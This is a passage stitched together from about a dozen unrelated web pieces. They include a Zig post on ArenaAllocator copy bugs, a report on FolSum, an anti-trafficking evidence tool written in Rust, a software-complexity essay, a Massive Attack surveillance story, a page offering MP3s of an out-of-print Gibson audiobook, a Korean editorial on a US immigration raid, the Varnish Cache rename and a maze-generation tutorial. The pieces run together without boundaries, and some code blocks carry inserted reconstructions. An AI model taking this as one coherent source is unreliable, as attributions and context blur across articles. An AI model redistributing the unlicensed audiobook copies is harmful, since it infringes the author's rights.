The main takeaway is that we can "promote" our ArenaAllocator.State back into an ArenaAllocator by providing the same allocator passed to init. This should make some sense. We saw that an ArenaAllocator is two fields: allocator and state. Our user stores the state and can turn that back into a full ArenaAllocator by providing the missing part: the allocator. What does this achieve? It makes our User struct smaller because it [indirectly] has one less field, the child_allocator. If you had thousands of ArenaAllocators, that could add up.
None of that tells us why this leaks:
var arena = std.heap.ArenaAllocator.init(allocator);
return .{
    .arena = arena,
    .name = try arena.allocator().dupe(u8, name),
};
The answer is: assignments are copies. When we assign the arena variable to our arena field, via .arena = arena, we're making a copy of our ArenaAllocator. At that point, it is correct to say we have two ArenaAllocators. One is the arena local variable and one belongs to the returned value. With this perspective, which arena do we dupe from and which do we deinit?

If we go back to our program and print user.arena.state.buffer_list.first, it'll print null: the arena stored in the returned user was copied before dupe was called, so its state knows nothing about the allocation. In short, we're duping from one arena and freeing from another. Now we can understand why re-ordering the field assignment fixes the issue.
var arena = ArenaAllocator.init(allocator);
return .{
    .name = try arena.allocator().dupe(u8, name),
    .arena = arena,
};
In this version, the copy that we're making happens after the allocation. There are still 2 arenas, but the mutation happens before the copy and thus the copy includes a copy of state which knows about the allocation made with dupe.
Solution
In some cases, re-arranging the code as we did might be suitable. But this would only work for simple cases, as it doesn't seem like a particularly robust solution. It's very easy to mess up. It's tempting to think that instead of copying the arena, we could just get its address:
const User = struct {
    name: []const u8,
    arena: *ArenaAllocator, // changed to a pointer

    fn init(allocator: Allocator, name: []const u8) !User {
        var arena = ArenaAllocator.init(allocator);
        return .{
            .arena = &arena, // changed to take the address
            .name = try arena.allocator().dupe(u8, name),
        };
    }

    // ...
};
It's true that now we only have 1 arena, because our field assignment is copying an address. But we've introduced a dangling pointer, since the address that we're copying lives on the stack, which will become invalid when we return.

This is a common problem, and not just with ArenaAllocators. We want to reference something and we need that something to outlive the current stack. That wasn't phrased as a question, but the answer is: put it on the heap:
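(Reconstructed heap-allocating version; note that the arena field stays a pointer:)

fn init(allocator: Allocator, name: []const u8) !User {
    const arena = try allocator.create(ArenaAllocator);
    arena.* = ArenaAllocator.init(allocator);
    return .{
        .arena = arena,
        .name = try arena.allocator().dupe(u8, name),
    };
}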
We've actually introduced another memory leak, but we're progressing; our original issue is fixed. allocator.create returns a *ArenaAllocator (a pointer to an ArenaAllocator). When we assign .arena = arena, we're still making a copy, but rather than making a copy of the ArenaAllocator and its state field, we're creating a copy of the address. A copy of an address still points to the same initial instance. Furthermore, our ArenaAllocator no longer lives on the function stack; it lives on the heap. It outlives the function call.
However, our code is now making a new allocation. Before, we were only allocating a duplicate of name. Now we're also allocating an ArenaAllocator which we never free. That's our new leak. We need to change user.deinit:
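(A sketch of the fix: deinit the arena, then free the heap allocation itself. The child allocator is grabbed first, and destroy goes through the allocator that created the arena:)

fn deinit(self: *User) void {
    const allocator = self.arena.child_allocator;
    self.arena.deinit();
    allocator.destroy(self.arena);
}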
The example we used ended up creating a memory leak, but you could get different results, including segfaults. The exact behavior is hard to reason about. In the case of pg.zig, multiple allocations were being made across copies of the same ArenaAllocator, reallocations were happening, and the "child allocator" had its own complexity. The result was a bus error - something you don't see often.

The issue isn't specific to ArenaAllocator, but from my own experience and help channels, I know others have had the same problem. Maybe that's because ArenaAllocators are frequently used. For me, it highlights the need to be mindful of assignments. You need to know what's being copied and how the original and the new copy are being used after the assignment takes place. Part of the subtlety comes from how simple this example is. The return statement both creates a copy and then mutates the original.
I somehow find this issue obvious in hindsight but also very subtle.
Fighting human trafficking with self-contained applications
Brooke Deuson is the developer behind Trafficking Free Tomorrow, a nonprofit organization that produces free software to help law enforcement combat human trafficking. She is a survivor of human trafficking herself. She spoke at RustConf 2025 about her mission, and why she chose to write her anti-trafficking software in Rust. Interestingly, it has nothing to do with Rust's lifetime-analysis-based memory-safety — instead, her choice was motivated by the difficulty she faces getting police departments to actually use her software. The fact that Rust is statically linked and capable of cross compilation by default makes deploying Rust software in those environments easier.
She started by pointing out that no software is going to be able to single-handedly put an end to human trafficking. Her goal for the programs Trafficking Free Tomorrow makes is to "raise the cost of selling people" to make human trafficking not economically viable. She does this by building tools for law enforcement, who are often already trying to stop human trafficking.
The problem is that trafficking is profitable, which means that the criminals who engage in it often have well-funded defenses and expensive lawyers. If there is any way for the defense to get evidence thrown out, they'll find it and do so. Before something becomes evidence in a court of law, it starts out as "stuff from a crime scene". In order to be usable as evidence, it needs to be tracked and signed off on at every step along the way, in order to prove that it couldn't have been tampered with.
Deuson described FolSum (the web site for which is offline at the time of writing, although Deuson is working on it), which is an MIT-licensed application that helps maintain this chain of custody for digital evidence. It records hashes of folders of digital evidence, and produces a report about what has and hasn't changed since the last run of the tool. This can be used to help prove the chain of custody in court.
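FolSum's source wasn't shown in the talk; as a rough illustration of the idea (hash every file in a folder, then diff the result against the previous run), a sketch along these lines works in Rust. The sha2 crate and all function names here are my assumptions, not FolSum's actual code:

// Sketch only: hashes every file in a folder (non-recursively) so that
// two runs can be compared. Uses the `sha2` crate.
use sha2::{Digest, Sha256};
use std::collections::BTreeMap;
use std::{fs, io, path::Path};

fn hash_folder(dir: &Path) -> io::Result<BTreeMap<String, String>> {
    let mut hashes = BTreeMap::new();
    for entry in fs::read_dir(dir)? {
        let entry = entry?;
        if entry.file_type()?.is_file() {
            let bytes = fs::read(entry.path())?;
            let digest = Sha256::digest(&bytes);
            let hex: String = digest.iter().map(|b| format!("{:02x}", b)).collect();
            hashes.insert(entry.file_name().to_string_lossy().into_owned(), hex);
        }
    }
    Ok(hashes)
}

// Report what changed since the last run: anything added, removed, or
// modified undermines the "nothing was tampered with" claim.
fn diff(old: &BTreeMap<String, String>, new: &BTreeMap<String, String>) -> Vec<String> {
    let mut report = Vec::new();
    for (name, hash) in new {
        match old.get(name) {
            None => report.push(format!("added: {name}")),
            Some(h) if h != hash => report.push(format!("modified: {name}")),
            _ => {}
        }
    }
    for name in old.keys() {
        if !new.contains_key(name) {
            report.push(format!("removed: {name}"));
        }
    }
    report
}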
This idea isn't recent; Deuson has been working on it for several years, ever since she had "a bad experience in college". Surviving that experience left her "really angry" and motivated her to start working with law enforcement to try to ensure it couldn't happen again.
She initially wrote simple Python scripts to
help with chain-of-custody problems. Those scripts worked on her machine, but she had
trouble delivering the software to the people who actually need it.
The users Deuson targets are largely underfunded police departments that can't
afford expensive commercial forensic solutions. The people there are usually
non-technical and more used to working with paper forms for evidence tracking.
They need software that is simple, self-explanatory, and capable of running in a
highly locked-down enterprise environment. Deuson's first attempt at
distributing her software was to bundle it using Kubernetes. That sort of
worked, but it turned out to be hard to get it installed in police departments.
Opening ports in the firewall is also often prohibitively hard.
"
Getting software into these environments is really difficult.
"
Eventually, she decided that the only way to make this work would be to write a
single, standalone executable that does everything locally. It would need to be
able to run on ancient desktop computers, in a variety of environments,
without external dependencies. That's why she ultimately chose Rust to write FolSum.
Rust is probably most famous for its approach to memory safety, but she said that those features weren't actually too relevant to her choice. It is important that Rust is a memory-safe language, though. Not because of the reliability of the software, but because it lets her point at things like the Biden administration's report on modern computer security or CISA's recommendations for secure software in order to justify her choice to non-technical lawyers. Being able to point at an official report that says a certain language is an approved way of producing secure software is actually quite helpful for getting FolSum adopted.
The main reason she chose Rust, though, was developer ergonomics. "I'm just one person", she explained. Nobody else is currently working at Trafficking Free Tomorrow. So if she wants to produce this software, it needs to be in a language that makes it easy to meet her requirements for producing self-contained applications.
Ultimately, she's happy that she chose to experiment with Rust. Writing a local
application instead of a server-based one let her keep things simple.
One thing that users really liked about the Rust version of the application was
that it starts quickly, she said. Lots of commercial software is
big and bulky, and takes a while to start up, leaving users staring at splash
screens. FolSum starts up almost as soon as
the user releases the mouse button. That's important, because it builds user
trust in the reliability of the application from the beginning, she said.
One of Rust's features is "fearless concurrency" — standard library APIs that make it impossible to construct data races in safe Rust code. When Deuson started writing FolSum, she didn't know anything about that. "Starting off, I didn't really know anything about concurrency. I didn't have formal training." So the first version of the program appeased Rust's concurrency model by using a single big mutex wrapped around a shared hash map.
That did work, but it led to a lot of difficult-to-debug deadlocks, "which sucks". Ultimately, she ended up rewriting the implementation to use channels, which results in fewer deadlocks. Notably, FolSum doesn't use any asynchronous code yet — it's all done with synchronous I/O, and the GUI actually runs in the same thread as the checksumming work.
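To make the two shapes concrete, here is a minimal sketch of the contrast described above, not FolSum's code: a big mutex around a shared map versus a channel where one worker owns the map outright.

use std::collections::HashMap;
use std::sync::{mpsc, Arc, Mutex};
use std::thread;

fn main() {
    // Shape 1: one big mutex around shared state (deadlock-prone in practice
    // once several locks interact).
    let shared: Arc<Mutex<HashMap<String, String>>> = Arc::new(Mutex::new(HashMap::new()));
    {
        let shared = Arc::clone(&shared);
        thread::spawn(move || {
            shared.lock().unwrap().insert("file".into(), "hash".into());
        })
        .join()
        .unwrap();
    }

    // Shape 2: channels; the worker owns the map and others send it messages.
    let (tx, rx) = mpsc::channel::<(String, String)>();
    let worker = thread::spawn(move || {
        let mut map = HashMap::new();
        for (k, v) in rx {
            map.insert(k, v);
        }
        map.len()
    });
    tx.send(("file".into(), "hash".into())).unwrap();
    drop(tx); // close the channel so the worker's loop ends
    worker.join().unwrap();
}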
The GUI is written using egui, which is an immediate-mode GUI framework, meaning that the interface is completely redrawn on every frame. Deuson called the approach "slightly cursed, but easy to reason about". The interface is basic, with no frills or animations — it's just a single window with some text and four buttons.
Deuson wrote it that way as a simple prototype, just to get something working. "I didn't think that UI would be nice, but the users actually really liked it." Now, she doesn't plan to change the interface. It turns out that non-technical users like the approach that she has called "GUI as docs", where the application puts the explanation of what it does right next to the individual buttons that do those things. Several users have told her that they wished other software was written like this, to her bafflement. For-profit software is often a forest of features, which makes it hard to find the specific thing one needs, especially if the tool is only rarely used, she said.
Some Rust features that she did really appreciate were the integrated unit
tests and benchmarking libraries. They let her focus on what she felt was
important, rather than spending time on boilerplate. On the other hand, she felt
that people should probably avoid advanced language features and extra
dependencies. She's written FolSum with basic for loops and plain imperative
code, and it works well for her.
In the future, she would like to add a few carefully chosen new features to
FolSum, including a progress bar and code to avoid overwhelming cheap
network-attached storage. She also wants to add a crash reporter that gives
users a report that they can send to her when something goes wrong.
Ultimately, FolSum is a pretty small piece of software. Building it helped her
iron out the web-site, continuous-integration, software-packaging, and
distribution problems; now that she knows what works, future software from
Trafficking Free Tomorrow is on a much firmer foundation.
There was only time for a few questions at the end of the session; one person
asked how she had dealt with the social problems of getting police departments
to adopt her software. Deuson explained that when talking to stakeholders, she
mostly didn't try to convince them of anything technical — instead, she tries to
think about who their bosses are, and who assumes the risk from choosing to use
FolSum. That's where resources like the White House recommendations are really
useful to convince users that it is actually a reasonable way to do things.
I asked what other anti-human-trafficking software she wanted to write in the future. Deuson responded that she had planned on "tons of stuff", including dedicated perceptual hashes for images, tools for working with recursively zipped files, a way to organize timelines of conversations, and open-source intelligence tools.
The goal Deuson has set for herself, of making human trafficking economically
unfeasible, is important but daunting; hopefully, her strategy of producing small,
dependable tools for the most under-resourced law-enforcement agencies will help
achieve it.
The Great Pyramids took decades to build. It was a monumental feat of human
ingenuity and collaboration. Today, we software developers erect our own
pyramids each day - not from stone, but from code. Yet despite far more advanced
tools, these systems don’t always make the experience better. So why, when KISS
(Keep It Simple, Stupid) is a well-known mantra, do we keep gravitating toward
complexity?
Marketing > Simplicity
Sell me this pen: ✎
What? You don’t know how? Okay, instead, sell me this Penzilla - a pen that can erase, write in different colors, play music, dial 911, act as a radio antenna, and even help you cheat on your homework.

In the software world, how would you sell a competitor to the cat command?
Sounds insane, right? It’s so simple - why would anyone compete with it, let
alone build an alternative? (Let’s pretend Rust coreutils don’t exist.)
But what if instead of a cat competitor, it was catzilla - a tool that could watch your files, hop through portals, and jump across networks? Now that’s marketable! Still, nobody would take you seriously. Why? Because cat just works, and it’s highly unlikely anyone will ever need anything else (just like Penzilla).
However, if catzilla were hyped from every corner of the internet, with a CatConf coming next month, you’d at least be curious to try it. Social proof makes you take it seriously. Even if it’s just a gimmick, it’s still a gimmick with users.
Complexity also signals effort, expertise, and exclusivity. If you struggle to
understand it, your brain rewards you with awe: “Wow, this must be really
smart,” you think - even if a simpler solution would work just as well.
Marketers, engineers, and startups all exploit this trick. The more layers, the
fancier the terminology, the more “premium” it feels. Complexity turns into a
status symbol rather than a necessity.
What is inside the Great Pyramids?
Whatever you put inside, duh. Like the Pyramids, modern software is built layer
upon layer - dependencies, frameworks, and abstractions stacked high. But just
as the Pyramids’ inner chambers are often empty, these layers can hide a lack of
substance, making maintenance a nightmare.
When you look at a Pyramid, a moment later you notice your mouth is hanging open in awe (close it now). Simplicity, on the other hand, doesn’t hold any secrets inside. It’s invisible until you realize it’s genius.

Complexity shouts, “Look at me!”, while simplicity whispers, “Did you notice?”. One thing is for sure, though: simplicity often wins in the long run. After the initial amazement is gone, it’s the function that quietly does the job that most people need.
React piles concepts into your mental backpack: rendering models, hooks, state
libraries, routing, and a build pipeline. Say no to it, and suddenly you’re the
“neckbeard stuck in the ’90s,” outside the cool-kids club.
The simple alternative is just around the corner: sprinkle vanilla JavaScript
where it’s needed and don’t build your identity around a framework. That mindset
is hard to swallow, though (especially when companies have spent millions
convincing developers their stack is the only way forward).
Beyond marketing: why we embrace complexity
While marketing glorifies and normalizes complexity, several deeper, more innate
forces draw us developers toward it:
The creative temptation: We are problem-solvers by nature. Building a complex, intricate system is a rewarding intellectual challenge, akin to solving a magnificent puzzle. The temptation to over-engineer is a powerful siren song when we’re flexing our creative muscles.

Legacy systems and technical debt: Many projects inherit convoluted codebases. Adding new features often means piling on more complexity rather than simplifying, as time and budget constraints prioritize quick fixes over elegant, simple solutions.

Team dynamics and collaboration: In large teams, developers add layers of abstraction to make code “future-proof” or accommodate diverse requirements. This can lead to over-engineered solutions as each contributor adds their own signature, creating a complex whole that no single person fully understands.

Pressure to innovate: In a competitive tech landscape, there’s a constant pressure to differentiate. Novelty and innovation are often expressed through new features and intricate designs, making complexity an easy, if not always effective, way to stand out.
Build pyramids with purpose
Build pyramids if you must, but build them like the Egyptians did: with a clear
purpose, a solid foundation, and chambers that actually contain something of
value - not just hollow, maze-like passages that future archaeologists (or the
poor soul maintaining your code in two years) will curse.
So next time you find yourself coding a 500-line abstraction for something that
could be copy-pasted a few times and done in 50 lines, ask yourself: are you
solving a real problem for the users and maintainers… or just indulging in
intellectual masturbation?
Linux Plumbers Conference registration open
Linux Weekly News
lwn.net
2025-09-15 23:18:35
Registration for the 2025 Linux Plumbers Conference (Tokyo, December 11 to 13) is now open. LPC tickets often sell out quickly, so it would be best not to delay if you intend to attend.
Massive Attack Turns Concert into Facial Recognition Surveillance Experiment
Bristol band uses live facial recognition on concertgoers to create uncomfortable art about surveillance culture
Imagine you’re vibing to “Teardrop” when suddenly your face appears on the massive LED screen behind the band. Not as a fun crowd shot—as processed data in Massive Attack’s real-time facial recognition system. Welcome to the most uncomfortable concert experience of 2025.
When Your Face Becomes the Show
The band deployed live facial recognition technology that captured and analyzed attendees during their recent performance.
During their latest tour stop, Massive Attack shocked fans by integrating facial recognition into the show itself. Live video feeds captured audience faces, processing them through recognition software and projecting the results as part of the visual experience. This wasn’t subtle venue security—your biometric data became part of the artistic statement, whether you consented or not.
Social media erupted with bewildered reactions from attendees. Some praised the band for forcing a conversation about surveillance that most people avoid, while others expressed discomfort with the unexpected data capture. The split reactions confirmed the band’s provocative intent had landed exactly as designed.
Art Meets Digital Resistance
This stunt aligns with the band’s decades-long critique of surveillance culture and digital control systems.
This provocation fits Massive Attack’s DNA perfectly. The Bristol collective has spent years weaving political commentary into their performances, particularly around themes of surveillance and control. Their collaboration with filmmaker Adam Curtis and consistent engagement with privacy issues positioned them as natural provocateurs for this moment.

Unlike typical concert technology that enhances your experience, this facial recognition system explicitly confronted attendees with the reality of data capture. The band made visible what usually happens invisibly—your face being recorded, analyzed, and potentially stored by systems you never explicitly agreed to interact with.
The Consent Question Nobody Asked
Details about data storage and participant consent remain unclear, adding to both artistic ambiguity and ethical concerns.
Here’s where things get murky. Massive Attack hasn’t released official details about what happened to the captured biometric data or whether permanent records were kept. This opacity intensifies the artistic statement while raising legitimate privacy questions about conducting surveillance to critique surveillance.
The audience split predictably along ideological lines. Privacy advocates called it a boundary violation disguised as art. Others viewed it as necessary shock therapy for our sleepwalking acceptance of facial recognition in everyday spaces. Both reactions prove the intervention achieved its disruptive goal.
Your relationship with facial recognition technology just got more complicated. Every venue, every event, every public space potentially captures your likeness. Massive Attack simply made the invisible visible—and deeply uncomfortable. The question now isn’t whether this was art or privacy violation, but whether you’re ready to confront how normalized surveillance has become in your daily life.
Show HN: Pooshit – sync local code to remote Docker containers
I'm a lazy developer for the most part, so this is for people like me. Sometimes I just want my local code running in live remote containers quickly, without building images and syncing to cloud docker repos or setting up git workflows or any of the other draining ways to get your code running remotely.
With pooshit (and a simple config file), you can simply push your local dev files to a remote folder on a VM then automatically remove relevant running containers, then build and run an updated container with one command line call.
It works well with reverse proxies like nginx or caddy as you can specify the docker run arguments in the pooshit_config files.
The author Ray Bradbury is one of the early science fiction authors who moved science fiction into a literary form. As a writer, Bradbury constructs beautifully written stories and novels. Bradbury's writing is in stark contrast to Bradbury as a speaker. The first time I heard Ray Bradbury speak was at the Association for Computing Machinery (ACM) yearly conference in Los Angeles in the 1980s. Hearing Bradbury speak is an almost painful experience. The pictures that Bradbury can paint with the written word seem to be entirely missing when Bradbury speaks. He is halting, awkward and does not seem to know where he wants to go in his talk.
In contrast to Bradbury, listening to William Gibson has the feel of his written work. The same complex world view and sentence structure is there, although not as finely edited. An example of this can be found in the documentary made about William Gibson, No Maps for These Territories. This documentary includes extensive interviews with William Gibson. No Maps also provides a glimpse of the way Gibson looks at the interconnections and relationships in the world around us. This view of Gibson's mind shows us his genius.
The mirror between William Gibson's spoken voice and his written voice gives special force to his readings of his work. Early in his career Gibson did an abridged reading of Neuromancer, his first novel and the work that made him famous. It was in this novel that Gibson coined the term cyberspace. This reading was only published on audio-tape and is now out of print.
I hate the idea that Gibson's wonderful reading of Neuromancer should be lost or inaccessible. I was only able to hear it because the Mountain View (California) Library had a copy. Fortunately I've been able to find an MP3 copy of these audio tapes. They can be downloaded below.
I am only providing these MP3s because the original has been out of print for years. As a software engineer I believe that I should be paid for my work. If I hold this view then it is only reasonable that I should also believe that artists should be paid for their work. All of the software and music I own I have paid for (or is open source).
I would prefer that the publisher re-issue the audio-tape of William
Gibson's reading in a more modern format (perhaps CD) and that William
Gibson collect royalties on this work. Gibson's reading has been out
of print so long that I can only assume that this is unlikely to
happen.
If you're a fan of William Gibson I hope that others will mirror these
files as well so that they will never be lost.
This reading was published on four magnetic tape audio cassettes. These have been re-recorded in MP3 format:
Neuromancer is one of the few books that I've read many times. All of Gibson's books are good (well, except for The Difference Engine, but that's Bruce Sterling's fault). Neuromancer is still in print, so you should go out and buy a copy if you want to read it. Writers pay their bills from the royalties from book sales. I've included the link above in case you want to get a feel for the book before you buy it (even paperback books are not cheap these days).
A worker at a Hyundai-LG battery plant in Georgia is shackled by US authorities after an immigration raid on Sept. 4, 2025. US Immigration and Customs Enforcement later released video footage of the raid. (Yonhap)
By Park Hyun, editorial writer
While many would have you believe that the fiasco involving over 300 Korean workers being arrested and detained by US immigration authorities has been resolved by allowing the workers to “voluntarily depart” back to Korea, this is far from the truth. Korea as a nation was deeply shocked to witness our workers, who had traveled to the US to work at the request of American investors, shackled at their hands and feet with chains. This barbaric incident will leave a lasting stain on Korea-US relations.
The mass arrests are undoubtedly a wake-up call, a major rupture that opens our eyes to what is happening in the US at this moment. We must heed this warning to close the loopholes and traps in our investment projects with the US. Otherwise, we may eventually face even greater calamity.
To understand what’s at the core of this situation, we must revisit the “Make America Great Again” movement championed by US President Donald Trump. MAGA represents a reactionary movement by white evangelical forces seeking to revert America to a time before the civil rights movement in the 1960s. Its core supporters are low-income, poorly educated white Americans and evangelical Protestants. Trump has become a voice amplifying the anxieties of these groups, whose societal status has been shaken by job losses due to globalization, deepening economic polarization, and a surge in immigration. Trump has incited them to channel their anger toward the established elite and “outsiders,” such as people of color, undocumented immigrants, and Muslims.
Trump is fundamentally a populist and white supremacist. His slogan of “Make America Great Again” would be phrased more accurately as “Make White America Great Again.” His insistence on imposing a 50% tariff specifically on steel and aluminum stems from the fact that white, Protestant populations are concentrated in the American Rust Belt.
The massive crackdown on allegedly undocumented immigrants at the Hyundai-LG Energy Solution plant in Georgia must also be understood within this context. The sight of our workers being led out in chains resembles images of African slaves in the 18th and 19th centuries being dragged out by their owners. The Department of Homeland Security boasted that the raid was “the largest single-site enforcement operation in [its] history,” and Immigration and Customs Enforcement even brazenly released footage of the operation — which clearly risks human rights violations — as if to flaunt these arrests as their achievement.
Far-right white Americans may have rejoiced inwardly at this incident. Even politicians like the governor of Georgia and local lawmakers, who had previously been enthusiastic about hosting the factory, have abruptly changed their stance and joined the chorus of discontent. This shift is likely because it’s difficult to ignore the anti-immigrant sentiment among Americans born into citizenship. The US is in the grip of an irrational frenzy, reminiscent of the McCarthyism that swept through American society in the 1950s. The US could have resolved this visa issue diplomatically by giving Korea advance notice as an ally. Yet, the crackdown — complete with helicopters and armored vehicles, as if to gleefully flaunt their power — can only be explained as a political performance.
The Trump administration’s plan to revive manufacturing in America is a strategy deeply influenced by political calculations rather than economic logic. Having stoked the discontent of the white working class in the Rust Belt to win his presidency, Trump has a strong motive to continue exploiting them politically. While he, as a political leader, may attempt to pursue such policies, these efforts amount to little more than wishful thinking. Historically, such attempts have rarely succeeded. If they had, why did the British Empire, once called a territory where the sun never sets, crumble over time?
Declining industries inevitably relocate to emerging nations over time. Even in Korea, we face difficulties in reviving such industries. How much more challenging would it be for the US, where production costs are at least 30% higher than ours, and over two decades of hollowing-out in manufacturing have collapsed the industrial ecosystem? Trump is dreaming a delusional fantasy of using imperial might to forcibly mobilize allies and reverse this trend. To make matters worse, treating allied workers who are trying their best to assist in realizing this pipe dream as if they are slaves of a vassal state will jeopardize even those projects that had some potential. We’re currently watching the US foolishly shoot itself in the foot.
This incident should prompt us in Korea to comprehensively reassess our investment projects in the US. We agreed to a tariff deal during a transitional period when President Lee Jae Myung had just taken office. Trump’s aggressive tactics forced us to follow Japan’s lead, but we must now take a cold, hard look at the specifics of what we agreed to. The US made outrageous demands on Japan: execute US$550 billion in investments within Trump’s term, provide funds within 45 days if Trump orders it, and hand over 50%-90% of profits to the US. Reports say the US is now making identical demands of us.
Following the footsteps of Japan, the world’s third-largest economy and a quasi-reserve currency nation, could poison our own economy. Rather than yielding to America’s unreasonable demands to avert an immediate crisis, the government must clearly distinguish what we can and cannot do and negotiate with the US. We must bear in mind that even if the manufacturing revival fails, the US, as the world’s largest economy and reserve currency holder, will likely suffer little harm. Our economy, on the other hand, could be severely shaken by a major shock.
I thought I had a verbal agreement with them, that “Varnish Cache” was the FOSS project and “Varnish Software” was the commercial entity, but the current position of Varnish Software’s IP lawyers is that nobody can use “Varnish Cache” in any context, without their explicit permission. [...]

We have tried to negotiate with Varnish Software for many months about this issue, but their IP lawyers still insist that Varnish Software owns the Varnish Cache name, and at most we have been offered a strictly limited permission, subject to their veto, for the FOSS project to use the “Varnish Cache” name.

We cannot live with that: We are an independent FOSS project with our own name.

So we will change the name of the project.

The new association and the new project will be named “The Vinyl Cache Project”, and this release, 8.0.0, will be the last under the “Varnish Cache” name.
I've been reading about mazes and how to generate them. The type of mazes I'll be talking about are 2D grids of connected cells. They're perfect mazes (i.e. there is exactly one unique path between any two cells, aka a uniform spanning tree).

I'll refer to the connections between cells as edges. An edge can be created between a cell and any of its neighbors (up, right, left, down). When two cells don't share an edge, there is a wall between them. While generating a maze, if a cell isn't reachable, I'll render it dark.
Left: user-facing maze view. Right: debug view.
A maze begins as a grid of unconnected cells. All dark. When we start connecting the cells, we create the maze.
The above visual was created with the following code.
const maze = new Maze(2, 2);
const A = maze.getCell(0, 0)
const B = maze.getCell(1, 0)
const C = maze.getCell(1, 1)
const D = maze.getCell(0, 1)
With our new maze, we can start carving edges between the four cells.
A.carveEdge(B)
B.carveEdge(C)
C.carveEdge(D)
Finally, we can pick the two points furthest from each other for the start and end positions. In this case, we pick A and D. Later, I'll explain how to find the two furthest points in any maze.

maze.start = A
maze.end = D
Aldous Broder
To automate our maze creation process, we can reach for one of the many maze generation algorithms. To start, I've chosen Aldous Broder because it's the easiest to code. It uses a random walk-based method to visit every cell, and it's likely the most frustrating to watch.

Though inefficient (it revisits cells already part of the maze during generation), it creates an unbiased maze. This means that every possible maze of a given size is equally likely to be generated.
You may be able to reverse engineer the algorithm by simply watching the maze generation. To define it very simply: walk around and connect unconnected cells.
const visited = new Set<Cell>();

// Choose a random starting cell
let current = randomMember(maze.cells.flat());
visited.add(current);

// While there are unvisited cells
while (visited.size < maze.width * maze.height) {
  // From the current cell, choose a random neighbour
  const next = shuffle(current.neighbors)[0];
  // If the neighbour has not been visited yet
  if (!visited.has(next)) {
    // Add an edge and mark as visited
    current.carveEdge(next);
    visited.add(next);
  }
  // Move to this neighbour whether or not it was visited
  current = next;
}
Random Depth-First Search
If we don't like the inefficiency of Aldous Broder, we can use Random Depth-First Search (DFS) to visit each cell once. By stepping from a cell to a random unvisited neighbor, we can traverse the tree.
You may recall that I described Aldous Broder as unbiased. Unfortunately, Random DFS tends to create long corridors due to the path's tendency to stick to one direction. Perhaps that's acceptable for your use case.
I've chosen the recursive version of this algorithm because I personally find it easier to follow.
const visited = new Set<Cell>();

// Visit a cell and carve a path to the next cell
async function visit(last: Cell, next: Cell) {
  // If the cell has already been visited, skip
  if (visited.has(next)) {
    return;
  }
  // Otherwise, mark the cell as visited
  visited.add(next);
  // Carve a path between the last cell and the next cell
  last.carveEdge(next);
  // Get the neighboring cells of the next cell that haven't been carved yet
  const neighbors = shuffle(next.uncarvedEdges());
  // Recursively visit each neighbor
  for (const neighbor of neighbors) {
    await visit(next, neighbor);
  }
}
// Start the maze generation by visiting a random neighbor of a random cell
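// (The call itself is missing from this copy; a minimal reconstruction,
// reusing the helpers above and seeding the visited set so the walk
// cannot loop back into the starting cell:)
const start = randomMember(maze.cells.flat());
visited.add(start);
await visit(start, shuffle(start.neighbors)[0]);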
Wilson's Algorithm

If Aldous Broder is inefficient, and Random DFS has a long-corridor bias, then we can choose something in between. Wilson's Algorithm is unbiased like Aldous Broder, but it doesn't revisit connected cells.

Wilson's Algorithm performs a loop erased random walk. The core loop is this: it starts at a random unvisited cell and randomly walks until it reaches the maze. If, during the walk, a loop is created, then that section of the loop is erased. The initial walk has to reach the single random cell that seeds the maze.

It tends to start slowly and ramp up.
A little more code is required for this one.
const unvisited = new Set<Cell>(maze.cells.flat());
const visited = new Set<Cell>();

// Choose one cell arbitrarily, add it to the maze, and mark it as visited
const startCell = randomMember(maze.cells.flat());
visited.add(startCell);
unvisited.delete(startCell);

// Continue until all cells have been visited
while (unvisited.size > 0) {
  let current = randomMember(unvisited);
  // The path is seeded with the walk's starting cell
  let path = [current];
  // Perform a random walk until reaching a cell already in the maze
  while (!visited.has(current)) {
    const next = randomMember(current.uncarvedEdges());
    // If a loop is formed, erase that section of the path
    const loopIndex = path.indexOf(next);
    if (loopIndex !== -1) {
      path = path.slice(0, loopIndex + 1);
    } else {
      path.push(next);
    }
    current = next;
  }
  // Add the path to the maze by carving edges and marking cells as visited
  for (let i = 0; i < path.length - 1; i++) {
    const cell = path[i];
    const nextCell = path[i + 1];
    cell.carveEdge(nextCell);
    visited.add(cell);
    unvisited.delete(cell);
  }
}
I've read in a few places that Wilson's Algorithm is faster than Aldous Broder at generating mazes; I've found this to be true in my brief tests. However, I haven't found this to be proven with any rigor. I also read that starting with Aldous Broder and then switching to Wilson's Algorithm (reasoning: Aldous Broder is slow at the end, Wilson's Algorithm is slow at the start) is faster than either. However, I haven't seen proof that this combination still results in a uniform spanning tree (where all possible mazes have equal probability).
Finding The Two Furthest Points
You may have noticed in these visualizations that the start and end positions (S and E) are added once the maze is complete. Usually, start and end positions are placed by the author of a handcrafted maze. They have meaning. For the mazes I’ve been generating, I simply pick the two furthest points.

The strategy for finding the two furthest points involves running two breadth-first searches while tracking the distance from the root cell in each search.

1. Choose a random starting cell A
2. BFS with A as root
3. Mark the furthest point from A as B
4. BFS with B as root
5. Mark the furthest point from B as C
6. The two furthest points are B and C
The start and end positions are then chosen randomly from these two points.
Finding the start and end cells via tree diameter.
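A minimal sketch of that double-BFS (the classic tree-diameter trick), assuming a carvedEdges() helper as the counterpart of the uncarvedEdges() used earlier:

function bfsFurthest(root: Cell): Cell {
  const seen = new Set<Cell>([root]);
  const queue: Cell[] = [root];
  let last = root;
  while (queue.length > 0) {
    const cell = queue.shift()!;
    last = cell; // cells are dequeued in nondecreasing distance from root
    for (const next of cell.carvedEdges()) {
      if (!seen.has(next)) {
        seen.add(next);
        queue.push(next);
      }
    }
  }
  return last; // one of the furthest cells from root
}

const B = bfsFurthest(randomMember(maze.cells.flat()));
const C = bfsFurthest(B);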
I suspect there is a way to figure out the start and end positions while also generating a maze. Perhaps not for all of the algorithms we covered. It feels possible.
As for resources, I found most of my jumping off points on the Wikipedia page Maze generation algorithm. Searching for maze algorithms usually turns up academic resources (with mixed levels of accessibility).

The code for all the visuals and algorithms can be found in the source of this website, specifically in the mazes directory. The mazes are rendered with <canvas> elements.
Ghost Kitchens Are Dying. Here's the $15 Billion Lesson Every Restaurateur Must Learn.
A ghost kitchen stripped away everything you think makes a restaurant a restaurant. No dining room. No servers. No storefront. No customers walking through the door. Just a kitchen. Four walls. Commercial equipment. And a phone that never stops ringing with delivery orders.
Ghost kitchens exist only in the digital world. Customers find them on DoorDash, Uber Eats, and Grubhub. They order through an app. Food gets cooked in a shared commercial space. A driver picks it up. 30 minutes later, it shows up at your door in a paper bag.
